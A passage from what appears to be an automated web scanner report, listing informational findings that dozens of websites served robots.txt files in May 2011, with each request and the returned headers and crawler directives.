X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

26.461. http://www.gowfb.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.gowfb.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.gowfb.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:38:50 GMT
Server: Apache
Last-Modified: Sat, 12 Dec 2009 21:29:41 GMT
ETag: "13c82d2-55-4b240b45"
Accept-Ranges: bytes
Content-Length: 85
Connection: close
Content-Type: text/plain

User-agent: *

Disallow: /test/

Disallow: /admin/

Disallow: /images/u_image_backup/

26.462. http://www.gran-turismo.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.gran-turismo.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.gran-turismo.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:41:14 GMT
Server: Apache/2.2.11 (Unix)
Last-Modified: Thu, 28 Jan 2010 07:06:09 GMT
ETag: "d2-47e342743da40"
Accept-Ranges: bytes
Content-Length: 210
Connection: close
Content-Type: text/plain; charset=UTF-8

User-Agent: *
Disallow: /*/gt5p/ranking/
Disallow: /*/gt5p/event/
Disallow: /*/products/gt5p/ranking/
Disallow: /*/products/gt5p/event/
Disallow: /*/academy/2010/ranking/
Disallow: /*/products/gt5ttc/
...[SNIP]...

26.463. http://www.grandpaandteen.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.grandpaandteen.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.grandpaandteen.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:08:19 GMT
Server: Apache/2.2.17 (Unix) PHP/5.2.14
Last-Modified: Sat, 08 May 2010 11:20:22 GMT
ETag: "217b53b-24-486135c8ba980"
Accept-Ranges: bytes
Content-Length: 36
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: Baiduspider
Disallow: /

26.464. http://www.grandsierraresort.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.grandsierraresort.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.grandsierraresort.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:53:01 GMT
Server: Apache
Last-Modified: Sat, 04 Dec 2010 21:42:01 GMT
ETag: "91c002-37-4969c8669fc40"
Accept-Ranges: bytes
Content-Length: 55
Connection: close
Content-Type: text/plain

User-agent: *
Allow: /
Disallow: /wireless-access

26.465. http://www.greatsite.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.greatsite.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.greatsite.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:01:30 GMT
Server: Apache
Last-Modified: Tue, 14 Jun 2005 00:54:57 GMT
ETag: "243a01c1-21-42ae2ae1"
Accept-Ranges: bytes
Content-Length: 33
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /scripts/

26.466. http://www.greekgear.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.greekgear.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.greekgear.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:35:15 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Cache-Control: max-age=3600, private
Expires: Tue, 03 May 2011 12:35:15 GMT
Last-Modified: Tue, 19 Apr 2011 05:04:46 GMT
Accept-Ranges: bytes
Content-Length: 344
Connection: close
Content-Type: text/plain

User-agent: *
# Cap is html
Disallow: /cgi-bin/
Disallow: /RT/
Disallow: /TG/
Disallow: /QS/
Disallow: /wgl/
Disallow: /P/
Disallow: /ymix/
Disallow: /OS/
Disallow: /cs/
Disallow: /en=
Disallow: /p/s=
...[SNIP]...

26.467. http://www.greenbankusa.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.greenbankusa.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.greenbankusa.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Fri, 21 May 2010 21:41:37 GMT
Accept-Ranges: bytes
ETag: "807eb3632ef9ca1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:27:53 GMT
Connection: close
Content-Length: 27

User-agent: *
Allow: /

26.468. http://www.greentreepayday.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.greentreepayday.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.greentreepayday.com

Response

HTTP/1.0 200 OK
Server: Resin/3.1.8
ETag: "48amZzUhAwU"
Last-Modified: Tue, 20 Apr 2010 22:37:06 GMT
Accept-Ranges: bytes
Content-Type: text/plain
Content-Length: 112
Date: Tue, 03 May 2011 10:29:22 GMT
Connection: close
Set-Cookie: epersist=Z3+iDSEdgVqumzKk0jcBLxoBfj8+J8CnpJNMo4gvtSPdN7iUDleqxOwh7b8O8Y+aBmXyWCpAW6Qj; path=/

# All robots will spider the domain

User-agent: *
Disallow:
Sitemap: http://www.simplyfinance.co.uk/sitemap.xml

26.469. http://www.grubhub.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.grubhub.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.grubhub.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:27:50 GMT
Server: Apache
Set-Cookie: JSESSIONID=99ADB06EEF1B5C8A0C4061FA9AE3EB91.worker2; Path=/
ETag: W/"839-1304107112000"
Last-Modified: Fri, 29 Apr 2011 19:58:32 GMT
Content-Length: 839
Cache-Control: max-age=0
Expires: Tue, 03 May 2011 10:27:50 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent:twiceler
Disallow: /

User-agent:BecomeBot
Disallow: /

User-agent:ShopWiki
Disallow: /

# Yandex: Russian search engine
User-agent:Yandex
Disallow: /

User-agent:YandexSomething
Disallow:
...[SNIP]...

26.470. http://www.gruntsmilitary.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.gruntsmilitary.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.gruntsmilitary.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:45:47 GMT
Server: Apache
Last-Modified: Tue, 01 Mar 2011 02:53:10 GMT
ETag: "12c-49d62e5869180"
Accept-Ranges: bytes
Content-Length: 300
Vary: Accept-Encoding
Cache-Control: public
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /contactforms/
Disallow: /contactforms.php
Disallow: /images/
Disallow: /ima/
Disallow: /clickheat/
Disallow: /css/
Disallow: /common/
Disallow: /flv/
Disallow: /js/
Disallow:
...[SNIP]...

26.471. http://www.gsmr.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.gsmr.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.gsmr.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:52:25 GMT
Server: Apache
Last-Modified: Sat, 06 Sep 2008 23:18:59 GMT
Accept-Ranges: bytes
Content-Length: 124
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /_mm/
Disallow: /_notes/
Disallow: /_baks/
Disallow: /MMWIP/

User-agent: googlebot
Disallow: *.csi

26.472. http://www.gtlakes.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.gtlakes.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.gtlakes.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2
Content-Type: text/plain; charset=utf-8
Date: Tue, 03 May 2011 10:33:07 GMT
X-Pingback: http://www.gtlakes.com/xmlrpc.php
Connection: close
Set-Cookie: X-Mapping-nbjnphkm=402F232C746ACF49498912F1AA8D144B; path=/
Content-Length: 24

User-agent: *
Disallow:

26.473. http://www.gtplanet.net/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.gtplanet.net
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.gtplanet.net

Response

HTTP/1.0 200 OK
Date: Tue, 03 May 2011 11:06:57 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: W3 Total Cache/0.9.1.1
Set-Cookie: PHPSESSID=vm4qfmqpr9bkr3aj0f93g2n2n1; path=/
X-Pingback: http://www.gtplanet.net/xmlrpc.php
Vary: Accept-Encoding
Content-Length: 24
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

26.474. http://www.guide4home.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.guide4home.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.guide4home.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:05:58 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Sun, 27 Feb 2011 13:48:55 GMT
ETag: "8289ec-17-d2fcdfc0"
Accept-Ranges: bytes
Content-Length: 23
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

26.475. http://www.guitarscanada.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.guitarscanada.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.guitarscanada.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:31:37 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_perl/2.0.4 Perl/v5.8.8
Last-Modified: Sat, 29 Jan 2011 17:51:12 GMT
ETag: "48c8001-27a-49affd4100400"
Accept-Ranges: bytes
Content-Length: 634
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /announcement.php
Disallow: /calendar.php
Disallow: /cron.php
Disallow: /editpost.php
Disallow: /faq.php
Disallow: /joinrequests.php
Disallow: /login.php
Disallow: /member.php

...[SNIP]...

26.476. http://www.gulfcoastrentals.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.gulfcoastrentals.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.gulfcoastrentals.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=604800
Content-Length: 259
Content-Type: text/plain
Last-Modified: Tue, 20 Nov 2007 23:34:52 GMT
Accept-Ranges: bytes
ETag: "076b0f2cd2bc81:332a"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:34:44 GMT
Connection: close

User-agent: freefind
disallow: /customer/
disallow: /_private/
disallow: /images/
disallow: /_fpclass/
disallow: /2friends/
disallow: /MailAllGC/
disallow: /zforms/
disallow: /zforms2/
disall
...[SNIP]...

26.477. http://www.gundogsupply.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.gundogsupply.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.gundogsupply.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:42:37 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Cache-Control: max-age=3600, private
Expires: Tue, 03 May 2011 12:42:37 GMT
Last-Modified: Tue, 19 Apr 2011 05:04:53 GMT
Accept-Ranges: bytes
Content-Length: 344
Connection: close
Content-Type: text/plain

User-agent: *
# Cap is html
Disallow: /cgi-bin/
Disallow: /RT/
Disallow: /TG/
Disallow: /QS/
Disallow: /wgl/
Disallow: /P/
Disallow: /ymix/
Disallow: /OS/
Disallow: /cs/
Disallow: /en=
Disallow: /p/s=
...[SNIP]...

26.478. http://www.guweb.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.guweb.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.guweb.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:42:57 GMT
Server: Apache/2.2.3 (Debian) mod_fastcgi/2.4.2 mod_ssl/2.2.3 OpenSSL/0.9.8c
Last-Modified: Mon, 18 Dec 2006 16:00:41 GMT
ETag: "113c2ec-9f-15565c40"
Accept-Ranges: bytes
Content-Length: 159
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /cgi-bin/
Disallow: /logs/
Disallow: /webalizer/

User-agent: EmailCollector
Disallow: /

User-agent: Mediapartners-Google*
Disallow:

26.479. http://www.gwinnettcounty.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.gwinnettcounty.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.gwinnettcounty.com

Response

HTTP/1.1 200 OK
Set-Cookie: GC-GOV=R3840386780; path=/
Server: Apache-Coyote/1.1
X-Powered-By: JBoss
ETag: W/"166-1270098708621"
Last-Modified: Thu, 01 Apr 2010 05:11:48 GMT
Content-Type: text/plain
Content-Length: 166
Date: Tue, 03 May 2011 10:42:56 GMT
Connection: close

User-agent: *
Disallow: /portal/gwinnett/Calendar/General/
Disallow: /portal/gwinnett/Calendar/TVGwinnett/
Disallow: /portal/gwinnett/Calendar/DOTEvents/
Allow: /

26.480. http://www.h2onews.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.h2onews.org
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.h2onews.org

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 09:29:50 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Sun, 08 Nov 2009 14:35:24 GMT
ETag: "d3694a5-130-fcc32300"
Accept-Ranges: bytes
Content-Length: 304
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /images/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /libraries/
Disallow: /
...[SNIP]...

26.481. http://www.hairloss-reversible.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.hairloss-reversible.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hairloss-reversible.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:40:35 GMT
Server: Apache
Last-Modified: Fri, 28 Sep 2007 13:08:17 GMT
ETag: "7d84a5-50-c7b7f240"
Accept-Ranges: bytes
Content-Length: 80
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

...User-agent: *
Allow:
Sitemap: http://www.hairloss-reversible.com/sitemap.xml

26.482. http://www.hairstyles.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.hairstyles.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hairstyles.com

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/plain
Accept-Ranges: bytes
ETag: "2941869496"
Last-Modified: Wed, 01 Sep 2010 21:40:13 GMT
Content-Length: 215
Date: Tue, 03 May 2011 10:17:15 GMT
Server: lighttpd

User-agent: *
Disallow: /
Disallow: /sear
Disallow: /imag
Disallow: /redirect.php
Disallow: /site-php/
Disallow: /kwpop.php
Disallow: /uniques.php
Disallow: /contact.php
Disallow: /offer.php
Disallow:
...[SNIP]...

26.483. http://www.halloweenmart.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.halloweenmart.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.halloweenmart.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:35:03 GMT
Server: Apache
Content-Length: 103
Last-Modified: Sat, 23 Apr 2011 00:28:30 GMT
NS_RTIMER_COMPOSITE: 1681978559:73686F702D6A6176613031332E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: NS_VER=2011.1.0; domain=www.halloweenmart.com; path=/
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=909
Connection: Keep-Alive
Content-Type: text/plain

# Allow all robots to spider everything by disallowing nothing

User-agent: *
Crawl-Delay: 20
Disallow:

26.484. http://www.hamsterwatch.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.hamsterwatch.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hamsterwatch.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:49:24 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Sun, 25 Jun 2006 10:32:32 GMT
ETag: "19dc4e-a4-fbb61000"
Accept-Ranges: bytes
Content-Length: 164
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /cgi-bin/
Disallow: /gfx/
Disallow: /cards/pickup/
Disallow: /banners/
Disallow: /contact.html

User-agent: Googlebot-Image
Disallow: /

26.485. http://www.handgunforum.net/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.handgunforum.net
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.handgunforum.net

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:59:17 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.17 OpenSSL/0.9.8q DAV/2 PHP/5.3.5 with Suhosin-Patch
Last-Modified: Sat, 11 Sep 2010 04:06:23 GMT
ETag: "95dcad-3d4-48ff3fc814dc0"
Accept-Ranges: bytes
Content-Length: 980
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /cgi-bin/
Disallow: /ajax.php
Disallow: /articlebot/
Disallow: /clientscript/
Disallow: /cpstyles/
Disallow: /customavatars/
Disallow: /customprofilepics/
Disallow: /calendar.
...[SNIP]...

26.486. http://www.happypublishing.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.happypublishing.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.happypublishing.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:24:25 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Thu, 14 Apr 2011 17:44:13 GMT
Accept-Ranges: bytes
Content-Length: 335
Vary: Accept-Encoding,User-Agent
X-Powered-By: W3 Total Cache/0.9.1.3
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /cdn-cgi/async/cf/uri/
Disallow: /quoteforum/
Disallow: /quotes.htm
Disallow: /wyrlessweb/
Disallow: /webring/
Disallow: /blog/wp-content/uploads/
Disallow: /blog/wp-content/pl
...[SNIP]...

26.487. http://www.have-fun-in-the-southwest.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.have-fun-in-the-southwest.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.have-fun-in-the-southwest.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:33:01 GMT
Server: Apache
Cache-Control: no-cache, no-store
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

Sitemap: http://www.have-fun-in-the-southwest.com/ohcbJfFG.xml

User-agent: Googlebot
Disallow: /dyn/
Disallow: /objects/
Crawl-delay: 30

User-agent: bingbot
Disallow: /cgi-bin/
Disallow: /bin/
Disal
...[SNIP]...

26.488. http://www.hcc.edu/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.hcc.edu
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hcc.edu

Response

HTTP/1.1 200 OK
Content-Length: 193
Content-Type: text/plain
Last-Modified: Tue, 10 Feb 2009 17:20:55 GMT
Accept-Ranges: bytes
ETag: "80f541eea38bc91:272"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:04:48 GMT
Connection: close

User-agent: *
Disallow: /_mm/
Disallow: /_notes/
Disallow: /_baks/
Disallow: /MMWIP/
Disallow: *.csi
Disallow: /hccnet/
Disallow: /Portal/
Crawl-delay: 5
Sitemap: http://www.hcc.edu/

26.489. http://www.hd4sale.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.hd4sale.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hd4sale.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:28:32 GMT
Server: Apache/1.3.37 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 PHP/4.3.11 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.28 OpenSSL/0.9.7a
Last-Modified: Fri, 07 Nov 2008 23:44:46 GMT
ETag: "8741f5-47-4914d2ee"
Accept-Ranges: bytes
Content-Length: 71
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:
Sitemap: http://www.hd4sale.com/sitemap.xml

26.490. http://www.healthcarejobsite.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.healthcarejobsite.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.healthcarejobsite.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Tue, 01 Mar 2011 16:11:08 GMT
Accept-Ranges: bytes
ETag: "fbc29462bd8cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:07:22 GMT
Connection: close
Content-Length: 360

User-Agent: *

Disallow: /mkt/rss/
Disallow: /CC/
Disallow: /Common/
Disallow: /EMP/Action/
Disallow: /EMP/Form/
Disallow: /JS/Form/
Disallow: /cc/
Disallow: /common/
Disallow: /emp/action/
...[SNIP]...

26.491. http://www.healthcareoccupations.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.healthcareoccupations.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.healthcareoccupations.com

Response

HTTP/1.1 200 OK
Content-Length: 544
Content-Type: text/plain
Content-Location: http://www.healthcareoccupations.com/robots.txt
Last-Modified: Tue, 04 Nov 2008 19:21:25 GMT
Accept-Ranges: bytes
ETag: "4a3bb987b23ec91:2d69"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:36:21 GMT
Connection: close

User-agent: *
Disallow: *.mdb
Disallow: *.xls
Disallow: *.doc
Disallow: *.zip
Disallow: *.txt
Disallow: *.js
Disallow: *.java
Disallow: *.inc
Disallow: *.cfm
Disallow: *.cfc
Disallow: *.cla
...[SNIP]...

26.492. http://www.healtheast.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.healtheast.org
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.healtheast.org

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:51:57 GMT
Server: Apache
Last-Modified: Sat, 10 Jan 2009 02:53:35 GMT
ETag: "138229-130-46017facb89c0"
Accept-Ranges: bytes
Content-Length: 304
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /images/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /libraries/
Disallow: /
...[SNIP]...

26.493. http://www.healthiertalk.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.healthiertalk.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.healthiertalk.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:32:44 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 25 May 2010 07:30:52 GMT
ETag: "4570020-651-4876623178300"
Accept-Ranges: bytes
Content-Length: 1617
Cache-Control: max-age=1209600
Expires: Tue, 17 May 2011 10:32:44 GMT
Connection: close
Content-Type: text/plain; charset=utf-8

# $Id: robots.txt,v 1.9.2.1 2008/12/10 20:12:19 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...

26.494. http://www.healthinsuranceinfo.net/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.healthinsuranceinfo.net
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.healthinsuranceinfo.net

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:18:33 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 28 Jul 2008 18:21:24 GMT
ETag: "b993b8-18-9744d100"
Accept-Ranges: bytes
Content-Length: 24
Connection: close
Content-Type: text/plain

User-Agent: *
Allow: /

26.495. http://www.healthy-oil-planet.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.healthy-oil-planet.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.healthy-oil-planet.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:37:46 GMT
Server: Apache
Cache-Control: no-cache, no-store
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

Sitemap: http://www.healthy-oil-planet.com/NKIzj22d.xml

User-agent: msnbot
Disallow: /cgi-bin/
Disallow: /bin/
Crawl-delay: 30

User-agent: Slurp
Disallow: /cgi-bin/
Disallow: /bin/

...[SNIP]...

26.496. http://www.healthy-recipes-for-kids.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.healthy-recipes-for-kids.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.healthy-recipes-for-kids.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:37:25 GMT
Server: Apache
Cache-Control: no-cache, no-store
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

Sitemap: http://www.healthy-recipes-for-kids.com/wUTNGhCI.xml

User-agent: Googlebot
Disallow: /dyn/
Disallow: /objects/
Crawl-delay: 30

User-agent: bingbot
Disallow: /cgi-bin/
Disallow: /bin/
Disall
...[SNIP]...

26.497. http://www.healthypets.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.healthypets.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.healthypets.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:19:58 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Cache-Control: max-age=3600, private
Expires: Tue, 03 May 2011 11:19:58 GMT
Last-Modified: Tue, 19 Apr 2011 05:04:52 GMT
Accept-Ranges: bytes
Content-Length: 344
Connection: close
Content-Type: text/plain

User-agent: *
# Cap is html
Disallow: /cgi-bin/
Disallow: /RT/
Disallow: /TG/
Disallow: /QS/
Disallow: /wgl/
Disallow: /P/
Disallow: /ymix/
Disallow: /OS/
Disallow: /cs/
Disallow: /en=
Disallow: /p/s=
...[SNIP]...

26.498. http://www.helloatlanta.com/favicon.ico previous next

Summary
